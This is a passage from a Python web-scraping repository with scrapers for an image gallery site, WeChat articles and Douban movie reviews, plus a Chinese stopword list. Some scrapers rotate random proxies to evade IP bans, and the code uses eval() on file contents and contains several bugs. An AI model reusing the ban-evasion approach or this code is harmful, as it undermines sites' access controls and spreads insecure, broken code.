获取页数 43 | return max_span 44 | except: 45 | print("获取最大页数异常!") 46 | traceback.print_exc() 47 | 48 | def re2title(string): 49 | result = re.sub(r'\*|\?|\?|\:|\:|\||\&|\$|\@|\>|\<|\""|\'\'|\“”|\\|\/', "", string) 50 | return result 51 | 52 | 53 | def download(all_url, root_path, num): 54 | try: 55 | count = 0 56 | a_soup = request(all_url) 57 | all_a = a_soup.find("div", class_="all").find_all("a") # 20180308 11:50 共2693个 58 | print(len(all_a)) 59 | for a in all_a[1:int(num)]: 60 | title = a.get_text() 61 | href = a["href"] # 获取a标签的链接 62 | 63 | # makdirs 64 | newTitle = re2title(title) 65 | path = newTitle.strip() 66 | os.makedirs(os.path.join(root_path, path)) 67 | os.chdir(root_path + "\\" + path) 68 | 69 | max_span = get_MaxPage(href) 70 | 71 | for page in range(1, int(max_span) + 1): 72 | page_url = href + "/" + str(page) 73 | 74 | img_soup = request(page_url) 75 | 76 | img_url = img_soup.find("div", class_="main-image").find("img")["src"] 77 | name = img_url[-9: -4] # 截取 78 | img = requests.get(img_url, headers=Picreferer) 79 | f = open(name + ".jpg", "wb") 80 | f.write(img.content) 81 | f.close 82 | count += 1 83 | # print("完成:" + title) 多线程时无法执行 84 | print("完成:" + str(count / (num - 1) * 100) + "%") 85 | except: 86 | print("下载异常!") 87 | traceback.print_exc() 88 | 89 | 90 | def main(): 91 | all_url = 'http://www.mzitu.com/all' # 爬取链接入口 92 | root_path = "E:\\mzitu" # 本地存储根目录 93 | num = 4 # 爬取个数-1 94 | 95 | if not os.path.isdir(root_path): 96 | os.makedirs(root_path) 97 | 98 | start_time = datetime.now() 99 | print(start_time) 100 | 101 | # 方法1 102 | download(all_url, root_path, num) 103 | 104 | # 方法2 105 | ''' 106 | # 线程池个数,电脑CPU个数 107 | pool = Pool(4) 108 | for i in range(4): 109 | pool.apply_async(download, args = (all_url, root_path, num) ) # apply_async非阻塞且支持结果返回进行回调 110 | pool.close() 111 | pool.join() 112 | ''' 113 | 114 | end_time = datetime.now() 115 | print(end_time) 116 | print("程序耗时:") 117 | print(end_time - start_time) 118 | 119 | 120 | if __name__ == "__main__": 121 | main() 122 | 123 | -------------------------------------------------------------------------------- /spider/get_url_data.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 获取接口资讯数据 6 | -------------------------------------- 7 | @File : get_url_data.py 8 | @Time : 2018/8/26 16:10 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from lxml import etree 18 | import random 19 | from time import sleep 20 | from selenium import webdriver 21 | 22 | 23 | def getHTMLText(url): 24 | driver = webdriver.PhantomJS(executable_path='D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # phantomjs的绝对路径 25 | driver.set_page_load_timeout(5) 26 | time.sleep(2) 27 | driver.get(url) # 获取网页 28 | time.sleep(2) 29 | return driver.page_source 30 | 31 | 32 | def getContent(headers, html): 33 | print(html) 34 | 35 | # options = webdriver.ChromeOptions() 36 | # 37 | # options.add_argument('--headless') 38 | # 39 | # driver = webdriver.Chrome(options =options) 40 | # driver.get(url) 41 | # print(url) 42 | # print(driver.page_source) 43 | 44 | 45 | 46 | 47 | if __name__ == '__main__': 48 | headers = { 49 | 'Connection': 'Keep-Alive', 50 | 'Accept': 'text/html, application/xhtml+xml, */*', 51 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 52 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 53 | } 54 | id_list = ['281239195'] 55 | 56 | url = "http://localhost:92/zx/cont.html?id=" + id_list[0] + "&type=jrtt" 57 | html = getHTMLText(url) 58 | getContent(headers, html) 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /spider/gzh/GZH.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 1. 爬取文章 7 | 2. 下载图片 8 | 3. 替换图片 9 | 4. 输出html 10 | -------------------------------- 11 | @Time : 2019/5/29 11:54 12 | @File : GZH.py 13 | @Software: PyCharm 14 | -------------------------------- 15 | @Author : lixj 16 | @contact : lixj_zj@163.com 17 | """ 18 | 19 | import requests 20 | from lxml import etree 21 | import logging 22 | import random 23 | import re 24 | import os 25 | import user_agent as userAgent 26 | import time 27 | import uuid 28 | 29 | # logging.basicConfig函数对日志的输出格式及方式做相关配置 30 | logging.basicConfig(level=logging.INFO, 31 | format='%(asctime)s - %(filename)s[line:%(lineno)d] ' 32 | '- %(levelname)s: %(message)s') 33 | 34 | 35 | def get_random_ip(): 36 | """ 37 | 获取随机的IP地址 38 | :return: 39 | """ 40 | with open("ip_pool.txt", "r") as f: # 构建IP池 41 | content = f.read() 42 | cont_list = content.split("', '") 43 | ip_list = cont_list[1:len(cont_list) - 1] 44 | random_ip = random.choice(ip_list) 45 | proxy_ip = "http://" + random_ip 46 | proxies = {"http": proxy_ip} 47 | logging.info("random ip is {}".format(proxies)) 48 | return proxies 49 | 50 | 51 | def download_img(img_link_list, img_path): 52 | """ 53 | 下载所有图片 54 | :param img_link_list: 55 | :param img_path: 56 | :return: 57 | """ 58 | if not os.path.exists(img_path): 59 | os.makedirs(img_path) 60 | os.chdir(img_path) # 切换下载图片的目录 61 | for img_num, img_link in enumerate(img_link_list): 62 | img = requests.get(img_link, headers=headers, proxies=proxies) 63 | try: 64 | suffix = img_link.split("=")[-1] 65 | if suffix in ["jpeg","png","jpg","gif","webp"]: 66 | with open(str(img_num) + "." + suffix, "wb") as f: 67 | f.write(img.content) 68 | logging.info("Download {img_num} th img succeed!".format(img_num=str(img_num))) 69 | else: 70 | continue 71 | except Exception as e: 72 | logging.error(str(e)) 73 | 74 | 75 | def getimg_link_list(url): 76 | """ 77 | 获取所有图片链接 78 | :param url: 79 | :return: 80 | """ 81 | try: 82 | req = requests.get(url, headers=headers, proxies=proxies) 83 | struct = etree.HTML(req.text) 84 | # 获取所有图片地址 85 | x_path = "//img/@data-src" # 匹配任意深度含有data-src熟悉的图片,获取链接 86 | img_link_list = struct.xpath(x_path) 87 | logging.info("get img link list succeed!") 88 | return img_link_list 89 | except Exception as e: 90 | logging.error(str(e)) 91 | 92 | 93 | def download_html(url, html_path): 94 | """ 95 | 下载html页面,命名为文章名.html 96 | :param url: 97 | :param html_path: 98 | :return: 99 | """ 100 | if not os.path.exists(html_path): 101 | os.makedirs(html_path) 102 | os.chdir(html_path) # 切换根目录 103 | try: 104 | req = requests.get(url, headers=headers, proxies=proxies) 105 | struct = etree.HTML(req.text) 106 | x_path = "//h2/text()" 107 | title = struct.xpath(x_path) 108 | html_name = title[0].replace("\\n", "").strip() 109 | with open(html_name + ".html", "w+", encoding="utf-8") as f: 110 | f.write(req.text) 111 | logging.info("download old html succeed!") 112 | return html_name 113 | except Exception as e: 114 | logging.error(str(e)) 115 | 116 | 117 | def replace_img(html_path, html_name, img_path): 118 | """ 119 | 替换图片 120 | :param html_path: 121 | :param html_name: 122 | :param img_path: 123 | :return: 124 | """ 125 | path_list = os.listdir(img_path) 126 | path_list.sort(key=lambda x: int(x.split(".")[0])) # 顺序读取 127 | os.chdir(html_path) 128 | with open(html_name + ".html", "r+", encoding="utf-8") as f: 129 | html = f.read() 130 | pattern = r'' 131 | img_re = re.compile(pattern) 132 | img_list = re.findall(img_re, html) 133 | 134 | for img, path in zip(imglist, path_list): 135 | img_tag_list = img.split(" />") 136 | fullimg_path = img_path + "\\" + path 137 | new_img_tag = img_tag_list[0] + "src=" + "\"" + fullimg_path + "\"" + " />" 138 | if html.__contains__(img): 139 | new_html = html.replace(img, new_img_tag) 140 | html = new_html 141 | logging.info("replace img succeed!") 142 | return html 143 | 144 | 145 | def del_file(path, html_name): 146 | """ 147 | 删除指定文件 148 | :param path: 149 | :param html_name: 150 | :return: 151 | """ 152 | try: 153 | os.remove(path + os.path.altsep + html_name + ".html") 154 | logging.info("remove file {html_name}.html done!".format(html_name=html_name)) 155 | except Exception as e: 156 | logging.error(str(e)) 157 | 158 | 159 | def write_img_to_new_html(newhtml_path, html, html_name): 160 | """ 161 | 重写文件中的图片,生成新的html 162 | :param newhtml_path: 163 | :param html: 164 | :param html_name: 165 | :return: 166 | """ 167 | os.chdir(newhtml_path) 168 | try: 169 | # 直接覆盖原来没有图片的文件 170 | with open(html_name + ".html", "w+", encoding="utf-8") as f: 171 | f.write(html) 172 | logging.info("rewrite img to new html succeed!") 173 | except Exception as e: 174 | logging.error(str(e)) 175 | 176 | 177 | def get_random_path_name(): 178 | """ 179 | 获取随机数命名文件夹 180 | :return: 181 | """ 182 | return time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime()) + "_" + str(uuid.uuid4()) 183 | 184 | 185 | def run(url): 186 | # 定义常量 187 | root_path = os.path.dirname(__file__) + os.path.altsep + "GZH" + os.path.altsep + get_random_path_name() 188 | img_path = root_path + os.path.altsep + "img" 189 | 190 | # 下载HTML文件 191 | html_name = download_html(url, root_path) 192 | 193 | # 下载图片 194 | img_list = getimg_link_list(url) 195 | download_img(img_list, img_path) 196 | 197 | # 替换图片写入新的HTML 198 | after_replace_img_html = replace_img(root_path, html_name, img_path) 199 | write_img_to_new_html(root_path, after_replace_img_html, html_name) 200 | 201 | 202 | if __name__ == '__main__': 203 | global proxies, headers 204 | headers = userAgent.UserAgent().get_headers() 205 | # 随机IP 206 | proxies = get_random_ip() 207 | 208 | url = "https://mp.weixin.qq.com/s/LzRn5vaNayeJ3Z41ZpLqxA" 209 | 210 | run(url) 211 | -------------------------------------------------------------------------------- /spider/movieReview/cleanData.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 数据处理 6 | -------------------------------------- 7 | @File : cleanData.py 8 | @Time : 2018/8/25 16:33 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import re 17 | 18 | def cleanData(HTMLDic): 19 | # for key in HTMLDic.keys(): 20 | print(type(HTMLDic[str(6)])) # 内容 21 | content = HTMLDic[str(6)] 22 | for i in range(len(content)): 23 | content[i] = re.sub(r'\*|\'|\ |\\|\/', "", str(content[i])) 24 | print(content) 25 | ''' 26 | jasdfj 27 | ''' 28 | 29 | 30 | def getHTMLDic(): 31 | tempFile = "./cleanData.txt" 32 | with open(tempFile, "r", encoding = "utf-8") as f: 33 | tempStr = f.read() 34 | tempDic = eval(tempStr) # str to dic 35 | return tempDic 36 | 37 | 38 | def main(): 39 | HTMLDic = getHTMLDic() 40 | cleanData(HTMLDic) 41 | 42 | main() 43 | 44 | -------------------------------------------------------------------------------- /spider/movieReview/film.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 爬取电影影评 6 | -------------------------------------- 7 | @File : film.py 8 | @Time : 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | ''' 17 | requests+bs4+jieba 18 | 19 | IPO 20 | Input: 电影网站链接 21 | Process: 网站链接 - 电影链接 - 评论处理 22 | Output: 词云图 23 | ''' 24 | 25 | import os 26 | import sys 27 | import requests 28 | import re 29 | import jieba 30 | import pandas as pd 31 | import numpy 32 | from pyecharts import WordCloud 33 | from bs4 import BeautifulSoup as bs 34 | 35 | 36 | # 获取电影 37 | def getNowPlayingMovie(url): 38 | r = requests.get(url) 39 | html = r.text 40 | soup = bs(html, "html.parser") 41 | nowplaying_movie = soup.find_all("div", id = "nowplaying") 42 | nowplaying_movie_list = nowplaying_movie[0].find_all("li", class_ = "list-item") # [0] 43 | movieList = [] 44 | for oneMovie in nowplaying_movie_list: 45 | movieDict = {} # 列表中的元组存储数据 46 | movieDict["id"] = oneMovie["data-subject"] # 通过css属性标签直接获取属性值 47 | movieDict["name"] = oneMovie["data-title"] 48 | movieList.append(movieDict) 49 | return movieList 50 | 51 | # 获取评论 52 | def getCommentsById(moviedId, pageNum): 53 | for i in range(pageNum): 54 | url = "https://movie.douban.com/subject/" + moviedId + "/comments?start=0&limit=" + str(i) 55 | 56 | # 处理特殊文字、符号的乱码问题 57 | non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd) 58 | r = requests.get(url) 59 | html = r.text 60 | html = html.translate(non_bmp_map) 61 | soup = bs(html, "html.parser") 62 | comments = soup.find_all("div", id = "comments") 63 | comments_list = comments[0].find_all("p", class_="") 64 | 65 | commentsResult = [] 66 | for comment in comments_list: 67 | if comment.string == None or comment.string == "": 68 | continue 69 | else: 70 | commentsResult.append(comment.string.strip()) 71 | return commentsResult 72 | 73 | # 数据处理 74 | def dataWranging(dataList): 75 | ## 1. 筛选所有评论文字 76 | dataStr = "" 77 | for data in dataList: 78 | dataStr = dataStr + data 79 | patten = re.compile(r"[\u4e00-\u9fa5]+") # 匹配所有文字 80 | filterData = re.findall(patten, dataStr) 81 | wrangedData = "".join(filterData) # List to String 82 | 83 | ## 2. 分词 84 | segment = jieba.lcut(wrangedData) # 结巴分词 85 | words_df = pd.DataFrame({'segment': segment}) # pandas显示分词结果 86 | 87 | ## 3. 除去停用词(设置chineseStopWords.txt文件为utf-8编码) 88 | stopwords = pd.read_csv(".\stopWords.txt", index_col = False, quoting = 3, sep = "\t", names = ["stopword"]) 89 | keyWords = words_df[~words_df.segment.isin(stopwords.stopword)] 90 | keyWordsList = [] 91 | temp = list(keyWords.as_matrix()) # 返回向量组成的列表 92 | for i in range(len(keyWords)): 93 | keyWordsList.append(temp[i][0]) 94 | 95 | ## 4. 词频统计 96 | keyWordDict = {} 97 | for keyWord in keyWordsList: 98 | if keyWord not in keyWordDict: 99 | keyWordDict[keyWord] = 1 100 | else: 101 | keyWordDict[keyWord] += 1 102 | keyWordDict = sorted(keyWordDict.items(), key = lambda x:x[1], reverse = True) # 按照频率排序 103 | return keyWordDict[:100] 104 | 105 | # 绘制词云图 106 | def wordCloud(keyWordDict, label): 107 | x = []; y = [] 108 | for i in range(len(keyWordDict)): 109 | x.append(keyWordDict[i][0]) 110 | y.append(keyWordDict[i][1]) 111 | wordCloud = WordCloud(label, width = 1300, height = 620) 112 | wordCloud.add("", x, y, word_size_range = [20, 100], shape = "circle") 113 | wordCloud.render() 114 | os.system(r"render.html") 115 | 116 | 117 | def main(): 118 | url = "https://movie.douban.com/cinema/nowplaying/shanghai/" 119 | # movieList = getNowPlayingMovie(url) 120 | 121 | pageNum = 5 122 | moviedId = "26363254" 123 | commentsResult = getCommentsById(moviedId, pageNum) 124 | 125 | keyWordDict = dataWranging(commentsResult) 126 | 127 | label = "词云图" 128 | wordCloud(keyWordDict, label) 129 | 130 | if __name__ == "__main__": 131 | main() 132 | 133 | 134 | -------------------------------------------------------------------------------- /spider/movieReview/filmComments.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 获取豆瓣影评 6 | -------------------------------------- 7 | @File : filmComments.py 8 | @Time : 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | 17 | """ 18 | requests + Xpath + pandas + MongoDB 19 | IPO: 20 | input: url 21 | process: 获取HTML页面内容,Xpath解析,pandas数据处理,数据写入csv文件,数据存入数据库 22 | output: csv文件、存入到mongodb 23 | 24 | 评论内容解析: 25 | id 26 | name 27 | recommend 28 | time 29 | title 30 | content https://movie.douban.com/review/5199026 + id 31 | useful 32 | useless 33 | comment 34 | res_name 35 | res_time 36 | res_content 37 | 38 | 问题: 39 | 1. 评论解析为空,适配不同的标签 √ 40 | 2. 评论文字过多,csv文件中单个单元格错乱 (设置阈值,大于则压缩或截取部分内容) 41 | 3. IP被封,调试问题 (将爬取下来的内容存入临时文件中,从文件中读取数据) 42 | 4. 数据清理,存储为文件 43 | """ 44 | 45 | import requests 46 | import re 47 | from lxml import etree 48 | import pandas as pd 49 | import csv 50 | import codecs 51 | import traceback 52 | import random 53 | 54 | # 选取随机的IP地址 55 | def getRandomIP(): 56 | with open("./ip_pool.txt", "r") as f: 57 | content = f.read() 58 | contList = content.split("', '") 59 | ipList = contList[1:len(contList)-1] 60 | random_ip = random.choice(ipList) 61 | proxy_ip = "http://" + random_ip 62 | proxies = {"http" : proxy_ip } 63 | return proxies 64 | 65 | def getHTMLContent(url, headers, proxies): 66 | res = requests.get(url, headers = headers, proxies = proxies) 67 | struct = etree.HTML(res.text) 68 | 69 | dic = {} 70 | filmName = struct.xpath('//div[@id="content"]/h1/text()') 71 | dic["0"] = filmName 72 | IDList = struct.xpath('//div[@class="main review-item"]/@id') 73 | dic["1"] = IDList 74 | nameList = struct.xpath('//a[@class="name"]/text()') 75 | dic["2"] = nameList 76 | recommendList = struct.xpath('//header[@class="main-hd"]/span/@title') 77 | dic["3"] = recommendList 78 | timeList = struct.xpath('//span[@class="main-meta"]/text()') 79 | dic["4"] = timeList 80 | titleList = struct.xpath('//div[@class="main-bd"]/h2/a/text()') 81 | dic["5"] = titleList 82 | 83 | contentList = [] 84 | for userid in IDList: 85 | contentURL = "https://movie.douban.com/review/" + userid 86 | r = requests.get(contentURL, headers = headers, proxies = proxies) 87 | contStruct = etree.HTML(r.text) 88 | fullContentOne = stripForList(contStruct.xpath('//div[@class="review-content clearfix"]/text()')) 89 | fullContentTwo = stripForList(contStruct.xpath('//div[@class="review-content clearfix"]/p/text()')) 90 | resultContent = fullContentOne + fullContentTwo # list合并 91 | contentList.append(resultContent) 92 | dic["6"] = contentList 93 | 94 | usefulList = stripForList(struct.xpath('//a[@title="有用"]/span/text()')) 95 | dic["7"] = usefulList 96 | uselessList = stripForList(struct.xpath('//a[@title="没用"]/span/text()')) 97 | dic["8"] = uselessList 98 | commentList = struct.xpath('//a[@class="reply"]/text()') 99 | dic["9"] = commentList 100 | 101 | with open("./temp2.txt", "w", encoding = "utf-8") as f: 102 | f.write(str(dic)) 103 | 104 | return dic 105 | 106 | def writeData2CSV(HTMLDic): 107 | csv_col_name = ["主题", "用户ID", "用户名", "推荐力度", "评论时间", "评论标题", "评论内容", "有用个数", "没用个数", "回应内容"] 108 | resultDic = {} 109 | 110 | HTMLDic = cleanData(HTMLDic) 111 | 112 | try: 113 | for i in range(1, len(csv_col_name)): 114 | resultDic[csv_col_name[i]] = HTMLDic[str(i)] 115 | dataframe = pd.DataFrame(resultDic) 116 | dataframe.to_csv("./test2.csv", sep=',', encoding = "utf_8_sig", columns = csv_col_name) # 解决中文在csv文件中乱码 117 | except: 118 | traceback.print_exception 119 | 120 | 121 | def cleanData(HTMLDic): 122 | print("begin clean...") 123 | dic = {'!,':'!', '……,':'……', '?,':'?', ',,':''} 124 | for j in range(len(HTMLDic)): 125 | if j == 6: # 清理内容 126 | for i in range(len(HTMLDic[str(j)])): 127 | HTMLDic[str(j)][i] = re.sub(r'\*|\'|\[|\]|\ |\\|\/', "", str(HTMLDic[str(j)][i])) 128 | for key,value in dic.items(): 129 | HTMLDic[str(j)][i] = HTMLDic[str(j)][i].replace(key, value) 130 | else: 131 | continue 132 | 133 | return HTMLDic 134 | 135 | 136 | def getHTMLDic(): 137 | tempFile = "./temp2.txt" 138 | tempStr = "" 139 | with open(tempFile, "r", encoding = "utf-8") as f: 140 | tempStr = f.read() 141 | tempDic = eval(tempStr) # str to dic 142 | return tempDic 143 | 144 | 145 | def stripForList(targetList): 146 | result = [] 147 | for target in targetList: 148 | result.append(target.strip()) 149 | return result 150 | 151 | 152 | def main(): 153 | url = "https://movie.douban.com/subject/1292212/reviews" 154 | headers = { 155 | 'Connection': 'Keep-Alive', 156 | 'Accept': 'text/html, application/xhtml+xml, */*', 157 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 158 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 159 | } 160 | #proxies = getRandomIP() 161 | #HTMLDic = getHTMLContent(url, headers, proxies) 162 | HTMLDic = getHTMLDic() 163 | writeData2CSV(HTMLDic) 164 | 165 | if __name__ == "__main__": 166 | main() 167 | 168 | 169 | -------------------------------------------------------------------------------- /spider/movieReview/stopWords.txt: -------------------------------------------------------------------------------- 1 | 的 2 | 一 3 | 不 4 | 在 5 | 人 6 | 有 7 | 是 8 | 为 9 | 以 10 | 于 11 | 上 12 | 他 13 | 而 14 | 后 15 | 之 16 | 来 17 | 及 18 | 了 19 | 因 20 | 下 21 | 可 22 | 到 23 | 由 24 | 这 25 | 与 26 | 也 27 | 此 28 | 但 29 | 并 30 | 个 31 | 其 32 | 已 33 | 无 34 | 小 35 | 我 36 | 们 37 | 起 38 | 最 39 | 再 40 | 今 41 | 去 42 | 好 43 | 只 44 | 又 45 | 或 46 | 很 47 | 亦 48 | 某 49 | 把 50 | 那 51 | 你 52 | 乃 53 | 它 54 | 吧 55 | 被 56 | 比 57 | 别 58 | 趁 59 | 当 60 | 从 61 | 到 62 | 得 63 | 打 64 | 凡 65 | 儿 66 | 尔 67 | 该 68 | 各 69 | 给 70 | 跟 71 | 和 72 | 何 73 | 还 74 | 即 75 | 几 76 | 既 77 | 看 78 | 据 79 | 距 80 | 靠 81 | 啦 82 | 了 83 | 另 84 | 么 85 | 每 86 | 们 87 | 嘛 88 | 拿 89 | 哪 90 | 那 91 | 您 92 | 凭 93 | 且 94 | 却 95 | 让 96 | 仍 97 | 啥 98 | 如 99 | 若 100 | 使 101 | 谁 102 | 虽 103 | 随 104 | 同 105 | 所 106 | 她 107 | 哇 108 | 嗡 109 | 往 110 | 哪 111 | 些 112 | 向 113 | 沿 114 | 哟 115 | 用 116 | 于 117 | 咱 118 | 则 119 | 怎 120 | 曾 121 | 至 122 | 致 123 | 着 124 | 诸 125 | 自 126 | 啊 127 | 阿 128 | 哎 129 | 哎呀 130 | 哎哟 131 | 唉 132 | 俺 133 | 俺们 134 | 按 135 | 按照 136 | 吧 137 | 吧哒 138 | 把 139 | 罢了 140 | 被 141 | 本 142 | 本着 143 | 比 144 | 比方 145 | 比如 146 | 鄙人 147 | 彼 148 | 彼此 149 | 边 150 | 别 151 | 别的 152 | 别说 153 | 并 154 | 并且 155 | 不比 156 | 不成 157 | 不单 158 | 不但 159 | 不独 160 | 不管 161 | 不光 162 | 不过 163 | 不仅 164 | 不拘 165 | 不论 166 | 不怕 167 | 不然 168 | 不如 169 | 不特 170 | 不惟 171 | 不问 172 | 不只 173 | 朝 174 | 朝着 175 | 趁 176 | 趁着 177 | 乘 178 | 冲 179 | 除 180 | 除此之外 181 | 除非 182 | 除了 183 | 此 184 | 此间 185 | 此外 186 | 从 187 | 从而 188 | 出 189 | 打 190 | 待 191 | 但 192 | 但是 193 | 当 194 | 当着 195 | 到 196 | 得 197 | 的 198 | 的话 199 | 等 200 | 等等 201 | 地 202 | 第 203 | 对 204 | 对于 205 | 多少 206 | 而 207 | 而况 208 | 而且 209 | 而是 210 | 而外 211 | 而言 212 | 而已 213 | 尔后 214 | 反过来 215 | 反过来说 216 | 反之 217 | 非但 218 | 非徒 219 | 否则 220 | 嘎 221 | 嘎登 222 | 刚 223 | 刚刚 224 | 该 225 | 赶 226 | 个 227 | 各 228 | 各个 229 | 各位 230 | 各种 231 | 各自 232 | 给 233 | 根据 234 | 跟 235 | 故 236 | 故此 237 | 固然 238 | 关于 239 | 管 240 | 归 241 | 果然 242 | 果真 243 | 过 244 | 哈 245 | 哈哈 246 | 呵 247 | 和 248 | 何 249 | 何处 250 | 何况 251 | 何时 252 | 嘿 253 | 哼 254 | 哼唷 255 | 呼哧 256 | 乎 257 | 哗 258 | 还是 259 | 还有 260 | 换句话说 261 | 换言之 262 | 或 263 | 或是 264 | 或者 265 | 极了 266 | 及 267 | 及其 268 | 及至 269 | 即 270 | 即便 271 | 即或 272 | 即令 273 | 即若 274 | 即使 275 | 几 276 | 几时 277 | 己 278 | 既 279 | 既然 280 | 既是 281 | 继而 282 | 加之 283 | 假如 284 | 假若 285 | 假使 286 | 鉴于 287 | 将 288 | 较 289 | 较之 290 | 叫 291 | 接着 292 | 结果 293 | 借 294 | 紧接着 295 | 进而 296 | 尽 297 | 尽管 298 | 经 299 | 经过 300 | 就 301 | 就是 302 | 就是说 303 | 据 304 | 具体地说 305 | 具体说来 306 | 开始 307 | 开外 308 | 靠 309 | 咳 310 | 可 311 | 可见 312 | 可是 313 | 可以 314 | 况且 315 | 啦 316 | 来 317 | 来着 318 | 离 319 | 例如 320 | 哩 321 | 连 322 | 连同 323 | 两者 324 | 了 325 | 临 326 | 另 327 | 另外 328 | 另一方面 329 | 论 330 | 嘛 331 | 吗 332 | 慢说 333 | 漫说 334 | 冒 335 | 么 336 | 每 337 | 每当 338 | 们 339 | 莫若 340 | 某 341 | 某个 342 | 某些 343 | 拿 344 | 哪 345 | 哪边 346 | 哪儿 347 | 哪个 348 | 哪里 349 | 哪年 350 | 哪怕 351 | 哪天 352 | 哪些 353 | 哪样 354 | 那 355 | 那边 356 | 那儿 357 | 那个 358 | 那会儿 359 | 那里 360 | 那么 361 | 那么些 362 | 那么样 363 | 那时 364 | 那些 365 | 那样 366 | 乃 367 | 乃至 368 | 呢 369 | 能 370 | 你 371 | 你们 372 | 您 373 | 宁 374 | 宁可 375 | 宁肯 376 | 宁愿 377 | 哦 378 | 呕 379 | 啪达 380 | 旁人 381 | 呸 382 | 凭 383 | 凭借 384 | 其 385 | 其次 386 | 其二 387 | 其他 388 | 其它 389 | 其一 390 | 其余 391 | 其中 392 | 却 393 | 去 394 | 起 395 | 起见 396 | 起见 397 | 岂但 398 | 恰恰相反 399 | 前后 400 | 前者 401 | 且 402 | 然而 403 | 然后 404 | 然则 405 | 让 406 | 人家 407 | 任 408 | 任何 409 | 任凭 410 | 如 411 | 如此 412 | 如果 413 | 如何 414 | 如其 415 | 如若 416 | 如上所述 417 | 若 418 | 若非 419 | 若是 420 | 啥 421 | 上下 422 | 尚且 423 | 设若 424 | 设使 425 | 甚而 426 | 甚么 427 | 甚至 428 | 省得 429 | 时候 430 | 十分 431 | 什么 432 | 什么样 433 | 使得 434 | 是 435 | 是的 436 | 首先 437 | 谁 438 | 谁知 439 | 顺 440 | 顺着 441 | 似的 442 | 虽 443 | 虽然 444 | 虽说 445 | 虽则 446 | 随 447 | 随着 448 | 所 449 | 所以 450 | 他 451 | 他们 452 | 他人 453 | 它 454 | 它们 455 | 她 456 | 她们 457 | 倘 458 | 倘或 459 | 倘然 460 | 倘若 461 | 倘使 462 | 腾 463 | 替 464 | 通过 465 | 同 466 | 同时 467 | 哇 468 | 万一 469 | 往 470 | 望 471 | 为 472 | 为何 473 | 为了 474 | 为什么 475 | 为着 476 | 喂 477 | 嗡嗡 478 | 我 479 | 我们 480 | 呜 481 | 呜呼 482 | 乌乎 483 | 无论 484 | 无宁 485 | 毋宁 486 | 嘻 487 | 吓 488 | 相对而言 489 | 像 490 | 向 491 | 向着 492 | 嘘 493 | 呀 494 | 焉 495 | 沿 496 | 沿着 497 | 要 498 | 要不 499 | 要不然 500 | 要不是 501 | 要么 502 | 要是 503 | 也 504 | 也罢 505 | 也好 506 | 一一 507 | ——— 508 | 一般 509 | 一边 510 | 一会儿 511 | 一旦 512 | 一定 513 | 一点点 514 | 一方面 515 | 一面 516 | 一来 517 | 一起 518 | 一切 519 | 一下 520 | 一下子 521 | 一样 522 | 一些 523 | 一则 524 | 一直 525 | 依 526 | 依照 527 | 矣 528 | 以 529 | 以便 530 | 以及 531 | 以免 532 | 以至 533 | 以至于 534 | 以致 535 | 抑或 536 | 因 537 | 因此 538 | 因而 539 | 因为 540 | 哟 541 | 用 542 | 由 543 | 由此可见 544 | 由于 545 | 有 546 | 有的 547 | 有关 548 | 有些 549 | 又 550 | 于 551 | 于是 552 | 于是乎 553 | 与 554 | 与此同时 555 | 与否 556 | 与其 557 | 越是 558 | 云云 559 | 哉 560 | 再说 561 | 再者 562 | 在 563 | 在下 564 | 咱 565 | 咱们 566 | 则 567 | 怎 568 | 怎么 569 | 怎么办 570 | 怎么样 571 | 怎样 572 | 咋 573 | 照 574 | 照着 575 | 者 576 | 这 577 | 这边 578 | 这儿 579 | 这个 580 | 这会儿 581 | 这就是说 582 | 这里 583 | 这么 584 | 这么点儿 585 | 这么些 586 | 这么样 587 | 这时 588 | 这些 589 | 这样 590 | 正如 591 | 吱 592 | 之 593 | 之类 594 | 之所以 595 | 之一 596 | 只是 597 | 只限 598 | 只要 599 | 只有 600 | 至 601 | 至于 602 | 诸位 603 | 着 604 | 着呢 605 | 自 606 | 自从 607 | 自个儿 608 | 自各儿 609 | 自己 610 | 自家 611 | 自身 612 | 综上所述 613 | 总的来看 614 | 总的来说 615 | 总的说来 616 | 总而言之 617 | 总之 618 | 纵 619 | 纵令 620 | 纵然 621 | 纵使 622 | 遵照 623 | 作为 624 | 兮 625 | 呃 626 | 呗 627 | 咚 628 | 咦 629 | 喏 630 | 啐 631 | 喔唷 632 | 嗬 633 | 嗯 634 | 嗳 635 | 也许 636 | 人 637 | 前 638 | 令 639 | 份 640 | 件 641 | 伏 642 | 众 643 | 众多 644 | 会 